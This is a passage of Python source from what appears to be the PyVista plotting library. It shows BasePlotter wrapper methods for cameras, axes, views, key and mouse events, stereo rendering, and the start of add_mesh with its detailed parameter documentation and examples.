@wraps(Renderer.enable_anti_aliasing)
def enable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.enable_anti_aliasing``."""
for renderer in self.renderers:
renderer.enable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.disable_anti_aliasing)
def disable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.disable_anti_aliasing``."""
self.renderer.disable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.set_focus)
def set_focus(self, *args, **kwargs):
"""Wrap ``Renderer.set_focus``."""
log.debug('set_focus: %s, %s', str(args), str(kwargs))
self.renderer.set_focus(*args, **kwargs)
self.render()
@wraps(Renderer.set_position)
def set_position(self, *args, **kwargs):
"""Wrap ``Renderer.set_position``."""
self.renderer.set_position(*args, **kwargs)
self.render()
@wraps(Renderer.set_viewup)
def set_viewup(self, *args, **kwargs):
"""Wrap ``Renderer.set_viewup``."""
self.renderer.set_viewup(*args, **kwargs)
self.render()
@wraps(Renderer.add_orientation_widget)
def add_orientation_widget(self, *args, **kwargs):
"""Wrap ``Renderer.add_orientation_widget``."""
return self.renderer.add_orientation_widget(*args, **kwargs)
@wraps(Renderer.add_axes)
def add_axes(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes``."""
return self.renderer.add_axes(*args, **kwargs)
@wraps(Renderer.hide_axes)
def hide_axes(self, *args, **kwargs):
"""Wrap ``Renderer.hide_axes``."""
return self.renderer.hide_axes(*args, **kwargs)
@wraps(Renderer.show_axes)
def show_axes(self, *args, **kwargs):
"""Wrap ``Renderer.show_axes``."""
return self.renderer.show_axes(*args, **kwargs)
@wraps(Renderer.update_bounds_axes)
def update_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.update_bounds_axes``."""
return self.renderer.update_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_chart)
def add_chart(self, *args, **kwargs):
"""Wrap ``Renderer.add_chart``."""
return self.renderer.add_chart(*args, **kwargs)
@wraps(Renderer.remove_chart)
def remove_chart(self, *args, **kwargs):
"""Wrap ``Renderer.remove_chart``."""
return self.renderer.remove_chart(*args, **kwargs)
@wraps(Renderer.add_actor)
def add_actor(self, *args, **kwargs):
"""Wrap ``Renderer.add_actor``."""
return self.renderer.add_actor(*args, **kwargs)
@wraps(Renderer.enable_parallel_projection)
def enable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.enable_parallel_projection``."""
return self.renderer.enable_parallel_projection(*args, **kwargs)
@wraps(Renderer.disable_parallel_projection)
def disable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.disable_parallel_projection``."""
return self.renderer.disable_parallel_projection(*args, **kwargs)
@wraps(Renderer.enable_shadows)
def enable_shadows(self, *args, **kwargs):
"""Wrap ``Renderer.enable_shadows``."""
return self.renderer.enable_shadows(*args, **kwargs)
@wraps(Renderer.disable_shadows)
def disable_shadows(self, *args, **kwargs):
"""Wrap ``Renderer.disable_shadows``."""
return self.renderer.disable_shadows(*args, **kwargs)
@property
def parallel_projection(self):
"""Return parallel projection state of active render window."""
return self.renderer.parallel_projection
@parallel_projection.setter
def parallel_projection(self, state):
"""Set parallel projection state of all active render windows."""
self.renderer.parallel_projection = state
@property
def parallel_scale(self):
"""Return parallel scale of active render window."""
return self.renderer.parallel_scale
@parallel_scale.setter
def parallel_scale(self, value):
"""Set parallel scale of all active render windows."""
self.renderer.parallel_scale = value
@wraps(Renderer.add_axes_at_origin)
def add_axes_at_origin(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes_at_origin``."""
return self.renderer.add_axes_at_origin(*args, **kwargs)
@wraps(Renderer.show_bounds)
def show_bounds(self, *args, **kwargs):
"""Wrap ``Renderer.show_bounds``."""
return self.renderer.show_bounds(*args, **kwargs)
@wraps(Renderer.add_bounding_box)
def add_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.add_bounding_box``."""
return self.renderer.add_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounding_box)
def remove_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounding_box``."""
return self.renderer.remove_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounds_axes)
def remove_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounds_axes``."""
return self.renderer.remove_bounds_axes(*args, **kwargs)
@wraps(Renderer.show_grid)
def show_grid(self, *args, **kwargs):
"""Wrap ``Renderer.show_grid``."""
return self.renderer.show_grid(*args, **kwargs)
@wraps(Renderer.set_scale)
def set_scale(self, *args, **kwargs):
"""Wrap ``Renderer.set_scale``."""
return self.renderer.set_scale(*args, **kwargs)
@wraps(Renderer.enable_eye_dome_lighting)
def enable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.enable_eye_dome_lighting``."""
return self.renderer.enable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.disable_eye_dome_lighting)
def disable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.disable_eye_dome_lighting``."""
self.renderer.disable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.reset_camera)
def reset_camera(self, *args, **kwargs):
"""Wrap ``Renderer.reset_camera``."""
self.renderer.reset_camera(*args, **kwargs)
self.render()
@wraps(Renderer.isometric_view)
def isometric_view(self, *args, **kwargs):
"""Wrap ``Renderer.isometric_view``."""
self.renderer.isometric_view(*args, **kwargs)
@wraps(Renderer.view_isometric)
def view_isometric(self, *args, **kwarg):
"""Wrap ``Renderer.view_isometric``."""
self.renderer.view_isometric(*args, **kwarg)
@wraps(Renderer.view_vector)
def view_vector(self, *args, **kwarg):
"""Wrap ``Renderer.view_vector``."""
self.renderer.view_vector(*args, **kwarg)
@wraps(Renderer.view_xy)
def view_xy(self, *args, **kwarg):
"""Wrap ``Renderer.view_xy``."""
self.renderer.view_xy(*args, **kwarg)
@wraps(Renderer.view_yx)
def view_yx(self, *args, **kwarg):
"""Wrap ``Renderer.view_yx``."""
self.renderer.view_yx(*args, **kwarg)
@wraps(Renderer.view_xz)
def view_xz(self, *args, **kwarg):
"""Wrap ``Renderer.view_xz``."""
self.renderer.view_xz(*args, **kwarg)
@wraps(Renderer.view_zx)
def view_zx(self, *args, **kwarg):
"""Wrap ``Renderer.view_zx``."""
self.renderer.view_zx(*args, **kwarg)
@wraps(Renderer.view_yz)
def view_yz(self, *args, **kwarg):
"""Wrap ``Renderer.view_yz``."""
self.renderer.view_yz(*args, **kwarg)
@wraps(Renderer.view_zy)
def view_zy(self, *args, **kwarg):
"""Wrap ``Renderer.view_zy``."""
self.renderer.view_zy(*args, **kwarg)
@wraps(Renderer.disable)
def disable(self, *args, **kwarg):
"""Wrap ``Renderer.disable``."""
self.renderer.disable(*args, **kwarg)
@wraps(Renderer.enable)
def enable(self, *args, **kwarg):
"""Wrap ``Renderer.enable``."""
self.renderer.enable(*args, **kwarg)
@wraps(Renderer.enable_depth_peeling)
def enable_depth_peeling(self, *args, **kwargs):
"""Wrap ``Renderer.enable_depth_peeling``."""
if hasattr(self, 'ren_win'):
result = self.renderer.enable_depth_peeling(*args, **kwargs)
if result:
self.ren_win.AlphaBitPlanesOn()
return result
@wraps(Renderer.disable_depth_peeling)
def disable_depth_peeling(self):
"""Wrap ``Renderer.disable_depth_peeling``."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
return self.renderer.disable_depth_peeling()
@wraps(Renderer.get_default_cam_pos)
def get_default_cam_pos(self, *args, **kwargs):
"""Wrap ``Renderer.get_default_cam_pos``."""
return self.renderer.get_default_cam_pos(*args, **kwargs)
@wraps(Renderer.remove_actor)
def remove_actor(self, *args, **kwargs):
"""Wrap ``Renderer.remove_actor``."""
for renderer in self.renderers:
renderer.remove_actor(*args, **kwargs)
return True
@wraps(Renderer.set_environment_texture)
def set_environment_texture(self, *args, **kwargs):
"""Wrap ``Renderer.set_environment_texture``."""
return self.renderer.set_environment_texture(*args, **kwargs)
#### Properties from Renderer ####
@property
def camera(self):
"""Return the active camera of the active renderer."""
if not self.camera_set:
self.camera_position = self.get_default_cam_pos()
self.reset_camera()
self.camera_set = True
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return self.renderer.length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
@scale.setter
def scale(self, scale):
"""Set the scaling of the active renderer."""
self.renderer.set_scale(*scale)
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderer.camera_position = camera_location
@property
def background_color(self):
"""Return the background color of the active render window."""
return self.renderers.active_renderer.GetBackground()
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
@property
def window_size(self):
"""Return the render window size in ``(width, height)``.
Examples
--------
Change the window size from ``200 x 200`` to ``400 x 400``.
>>> import pyvista
>>> pl = pyvista.Plotter(window_size=[200, 200])
>>> pl.window_size
[200, 200]
>>> pl.window_size = [400, 400]
>>> pl.window_size
[400, 400]
"""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
def _check_rendered(self):
"""Check if the render window has been shown and raise an exception if not."""
if not self._rendered:
raise AttributeError('\nThis plotter has not yet been setup and rendered '
'with ``show()``.\n'
'Consider setting ``off_screen=True`` '
'for off screen rendering.\n')
def _check_has_ren_win(self):
"""Check if render window attribute exists and raise an exception if not."""
if not hasattr(self, 'ren_win'):
raise AttributeError('\n\nTo retrieve an image after the render window '
'has been closed, set:\n\n'
' ``plotter.store_image = True``\n\n'
'before closing the plotter.')
@property
def image(self):
"""Return an image array of current render window.
To retrieve an image after the render window has been closed,
set: ``plotter.store_image = True`` before closing the plotter.
"""
if not hasattr(self, 'ren_win') and self.last_image is not None:
return self.last_image
self._check_rendered()
self._check_has_ren_win()
data = image_from_window(self.ren_win)
if self.image_transparent_background:
return data
# ignore alpha channel
return data[:, :, :-1]
def render(self):
"""Render the main window.
Does nothing until ``show`` has been called.
"""
if hasattr(self, 'ren_win') and not self._first_time:
log.debug('Rendering')
self.ren_win.Render()
self._rendered = True
@wraps(RenderWindowInteractor.add_key_event)
def add_key_event(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.add_key_event."""
if hasattr(self, 'iren'):
self.iren.add_key_event(*args, **kwargs)
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key.
Parameters
----------
key : str
Key to clear events for.
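        Examples
        --------
        A brief sketch: register a key callback and then remove it again
        (``callback`` here is only a placeholder).
        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> callback = lambda: print('k was pressed')
        >>> pl.add_key_event('k', callback)
        >>> pl.clear_events_for_key('k')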
"""
self.iren.clear_events_for_key(key)
def store_mouse_position(self, *args):
"""Store mouse position."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.get_event_position()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.get_event_position()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks
supported here - use
:func:`pyvista.BasePlotter.track_click_position` instead.
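        Examples
        --------
        A short sketch: once tracking is enabled, the latest position is
        stored on ``mouse_position`` (``None`` until the mouse moves).
        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> pl.track_mouse_position()
        >>> pl.mouse_position is None
        True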
"""
self.iren.track_mouse_position(self.store_mouse_position)
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
self.iren.untrack_mouse_position()
@wraps(RenderWindowInteractor.track_click_position)
def track_click_position(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.track_click_position."""
self.iren.track_click_position(*args, **kwargs)
def untrack_click_position(self):
"""Stop tracking the click position."""
self.iren.untrack_click_position()
def _prep_for_close(self):
"""Make sure a screenshot is acquired before closing.
This doesn't actually close anything! It just preps the plotter for
closing.
"""
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size
and line width by the given value.
Parameters
----------
increment : float
Amount to increment point size and line width.
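        Examples
        --------
        A minimal sketch: grow every actor's point size and line width
        by 2, then shrink them back again.
        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> _ = pl.add_mesh(pyvista.Sphere(), style='wireframe')
        >>> pl.increment_point_size_and_line_width(2)
        >>> pl.increment_point_size_and_line_width(-2)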
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
self.render()
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
if hasattr(self, 'iren'):
self.iren.clear_key_event_callbacks()
self.add_key_event('q', self._prep_for_close) # Add no matter what
b_left_down_callback = lambda: self.iren.add_observer('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
@wraps(RenderWindowInteractor.key_press_event)
def key_press_event(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.key_press_event."""
self.iren.key_press_event(*args, **kwargs)
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
if hasattr(self.ren_win, 'GetOffScreenFramebuffer'):
if not self.ren_win.GetOffScreenFramebuffer().GetFBOIndex():
                # must raise an error early, as proceeding would cause a segfault on VTK9
raise ValueError('Invoking helper with no framebuffer')
# Get 2D click location on window
click_pos = self.iren.get_event_position()
# Get corresponding click location in the 3D plot
picker = _vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
@wraps(RenderWindowInteractor.enable_trackball_style)
def enable_trackball_style(self):
"""Wrap RenderWindowInteractor.enable_trackball_style."""
self.iren.enable_trackball_style()
@wraps(RenderWindowInteractor.enable_trackball_actor_style)
def enable_trackball_actor_style(self):
"""Wrap RenderWindowInteractor.enable_trackball_actor_style."""
self.iren.enable_trackball_actor_style()
@wraps(RenderWindowInteractor.enable_image_style)
def enable_image_style(self):
"""Wrap RenderWindowInteractor.enable_image_style."""
self.iren.enable_image_style()
@wraps(RenderWindowInteractor.enable_joystick_style)
def enable_joystick_style(self):
"""Wrap RenderWindowInteractor.enable_joystick_style."""
self.iren.enable_joystick_style()
@wraps(RenderWindowInteractor.enable_joystick_actor_style)
def enable_joystick_actor_style(self):
"""Wrap RenderWindowInteractor.enable_joystick_actor_style."""
self.iren.enable_joystick_actor_style()
@wraps(RenderWindowInteractor.enable_zoom_style)
def enable_zoom_style(self):
"""Wrap RenderWindowInteractor.enable_zoom_style."""
self.iren.enable_zoom_style()
@wraps(RenderWindowInteractor.enable_terrain_style)
def enable_terrain_style(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.enable_terrain_style."""
self.iren.enable_terrain_style(*args, **kwargs)
@wraps(RenderWindowInteractor.enable_rubber_band_style)
def enable_rubber_band_style(self):
"""Wrap RenderWindowInteractor.enable_rubber_band_style."""
self.iren.enable_rubber_band_style()
@wraps(RenderWindowInteractor.enable_rubber_band_2d_style)
def enable_rubber_band_2d_style(self):
"""Wrap RenderWindowInteractor.enable_rubber_band_2d_style."""
self.iren.enable_rubber_band_2d_style()
def enable_stereo_render(self):
"""Enable stereo rendering.
Disable this with :func:`disable_stereo_render
<BasePlotter.disable_stereo_render>`
Examples
--------
Enable stereo rendering to show a cube as an anaglyph image.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.enable_stereo_render()
>>> pl.show()
"""
if hasattr(self, 'ren_win'):
self.ren_win.StereoRenderOn()
self.ren_win.SetStereoTypeToAnaglyph()
def disable_stereo_render(self):
"""Disable stereo rendering.
Enable again with :func:`enable_stereo_render
<BasePlotter.enable_stereo_render>`
Examples
--------
Enable and then disable stereo rendering. It should show a simple cube.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.enable_stereo_render()
>>> pl.disable_stereo_render()
>>> pl.show()
"""
if hasattr(self, 'ren_win'):
self.ren_win.StereoRenderOff()
def hide_axes_all(self):
"""Hide the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.hide_axes()
def show_axes_all(self):
"""Show the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.show_axes()
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.get_interactor_style()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor
in milliseconds.
force_redraw : bool, optional
Call ``render`` immediately.
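        Examples
        --------
        A hedged sketch of a typical polling loop that keeps an open
        window responsive while other work runs; the loop bound is
        arbitrary.
        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> _ = pl.add_mesh(pyvista.Sphere())
        >>> pl.show(interactive_update=True)  # doctest:+SKIP
        >>> for _ in range(10):  # doctest:+SKIP
        ...     pl.update(stime=10)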
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if self.iren is not None:
update_rate = self.iren.get_desired_update_rate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.create_repeating_timer(stime)
self.render()
Plotter.last_update_time = curr_time
return
if force_redraw:
self.render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=None, split_sharp_edges=False,
ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
culling=None, rgb=None, categories=False, silhouette=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, preference="point",
log_scale=False, pbr=False, metallic=0.0, roughness=0.5,
render=True, component=None, **kwargs):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method is using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.DataSet or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy
arrays of XYZ points.
color : str or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : str, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name
of an array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active
scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : str or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also
applicable when style='points'. Default ``5.0``.
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a single float value is given, it
will be the global opacity of the mesh and uniformly
applied everywhere - should be between 0 and 1. A string
can also be specified to map the scalars range to a
predefined opacity transfer function (options include:
``'linear'``, ``'linear_r'``, ``'geom'``, ``'geom_r'``).
A string could also be used to map a scalars array from
the mesh to the opacity (must have same number of elements
as the ``scalars`` argument). Or you can pass a custom
made transfer function that is an array either
``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r``
suffix to do this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default ``False``.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is
``True``. When ``False``, OpenGL will interpolate the
            mapped colors, which can result in showing colors that are
not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to use when mapping the
``scalars``. See available Matplotlib colormaps. Only
applicable for when displaying ``scalars``. Requires
Matplotlib to be installed. ``colormap`` is also an
accepted alias for this. If ``colorcet`` or ``cmocean``
are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the
scalar bar to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If ``False``, a scalar bar will not be added to the
scene. Defaults to ``True``.
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or bool, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
Render points as spheres rather than dots.
render_lines_as_tubes : bool, optional
Show lines as thick tubes rather than flat lines. Control
the width with ``line_width``.
smooth_shading : bool, optional
Enable smooth shading when ``True`` using either the
Gouraud or Phong shading algorithm. When ``False``, use
flat shading. Automatically enabled when ``pbr=True``.
See :ref:`shading_example`.
split_sharp_edges : bool, optional
Split sharp edges exceeding 30 degrees when plotting with
smooth shading. Control the angle with the optional
keyword argument ``feature_angle``. By default this is
``False``. Note that enabling this will create a copy of
the input mesh within the plotter. See
:ref:`shading_example`.
ambient : float, optional
When lighting is enabled, this is the amount of light in
the range of 0 to 1 (default 0.0) that reaches the actor
when not directed at the light source emitted from the
viewer.
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0.
specular : float, optional
The specular lighting coefficient. Default 0.0.
specular_power : float, optional
The specular power. Between 0.0 and 128.0.
nan_color : str or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted
scalar array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0.
culling : str, optional
Does not render faces that are culled. Options are
``'front'`` or ``'back'``. This can be helpful for dense
surface meshes, especially when edges are visible, but can
cause flat meshes to be partially displayed. Defaults to
``False``.
rgb : bool, optional
            If a 2-dimensional array is passed as the scalars, plot
those values as RGB(A) colors. ``rgba`` is also an
accepted alias for this. Opacity (the A) is optional. If
a scalars array ending with ``"_rgba"`` is passed, the default
becomes ``True``. This can be overridden by setting this
parameter to ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in
the scalar array will be used as the ``n_colors``
argument.
silhouette : dict, bool, optional
If set to ``True``, plot a silhouette highlight for the
mesh. This feature is only available for a triangulated
``PolyData``. As a ``dict``, it contains the properties
of the silhouette to display:
* ``color``: ``str`` or 3-item ``list``, color of the silhouette
* ``line_width``: ``float``, edge width
* ``opacity``: ``float`` between 0 and 1, edge transparency
* ``feature_angle``: If a ``float``, display sharp edges
exceeding that angle in degrees.
* ``decimate``: ``float`` between 0 and 1, level of decimation
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond
to transparency.
below_color : str or 3 item list, optional
Solid color for values below the scalars range
(``clim``). This will automatically set the scalar bar
``below_label`` to ``'Below'``.
above_color : str or 3 item list, optional
Solid color for values above the scalars range
(``clim``). This will automatically set the scalar bar
``above_label`` to ``'Above'``.
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float
values in the scalars range to annotate on the scalar bar
and the values are the string annotations.
pickable : bool, optional
Set whether this actor is pickable.
preference : str, optional
When ``mesh.n_points == mesh.n_cells`` and setting
scalars, this parameter sets how the scalars will be
mapped to the mesh. The default, ``'points'``, causes the
scalars to be associated with the mesh points. Can be
either ``'points'`` or ``'cells'``.
log_scale : bool, optional
Use log scale when mapping data to colors. Scalars less
than zero are mapped to the smallest representable
positive float. Default: ``False``.
pbr : bool, optional
Enable physics based rendering (PBR) if the mesh is
``PolyData``. Use the ``color`` argument to set the base
color. This is only available in VTK>=9.
metallic : float, optional
Usually this value is either 0 or 1 for a real material
but any value in between is valid. This parameter is only
used by PBR interpolation. Default value is 0.0.
roughness : float, optional
This value has to be between 0 (glossy) and 1 (rough). A
glossy material has reflections and a high specular
part. This parameter is only used by PBR
interpolation. Default value is 0.5.
render : bool, optional
Force a render when ``True``. Default ``True``.
component : int, optional
Set component of vector valued scalars to plot. Must be
nonnegative, if supplied. If ``None``, the magnitude of
the vector is plotted.
**kwargs : dict, optional
Optional developer keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the mesh.
Examples
--------
Add a sphere to the plotter and show it with a custom scalar
bar title.
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere,
... scalar_bar_args={'title': 'Z Position'})
>>> plotter.show()
Plot using RGB on a single cell. Note that since the number of
points and the number of cells are identical, we have to pass
``preference='cell'``.
>>> import pyvista
>>> import numpy as np
>>> vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]])
>>> faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]])
>>> mesh = pyvista.PolyData(vertices, faces)
>>> mesh.cell_data['colors'] = [[255, 255, 255],
... [0, 255, 0],
... [0, 0, 255],
... [255, 0, 0]]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
... rgb=True, preference='cell')
>>> plotter.camera_position='xy'
>>> plotter.show()
Note how this differs from the ``preference='cell'`` case above:
here each point is individually colored, whereas with
``preference='cell'`` each cell face is individually colored.
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
... rgb=True, preference='point')
>>> plotter.camera_position='xy'
>>> plotter.show()
Plot a plane with a constant color and vary its opacity by point.
>>> plane = pyvista.Plane()
>>> plane.plot(color='b', opacity=np.linspace(0, 1, plane.n_points),
... show_edges=True)
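As a further sketch, scalar bar annotations can be supplied as a
dictionary mapping scalar values to label strings (the annotation
values used here are arbitrary).
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere, scalars='Data',
...                      annotations={-0.4: 'Low', 0.4: 'High'})
>>> plotter.show()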
"""
self.mapper = make_mapper(_vtk.vtkDataSetMapper)
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError(f'Object type ({type(mesh)}) not supported for plotting in PyVista.')
##### Parse arguments to be used for all meshes #####
# Avoid mutating input
if scalar_bar_args is None:
scalar_bar_args = {'n_colors': n_colors}
else:
scalar_bar_args = scalar_bar_args.copy()
if show_edges is None:
show_edges = self._theme.show_edges
if edge_color is None:
edge_color = self._theme.edge_color
if show_scalar_bar is None:
show_scalar_bar = self._theme.show_scalar_bar
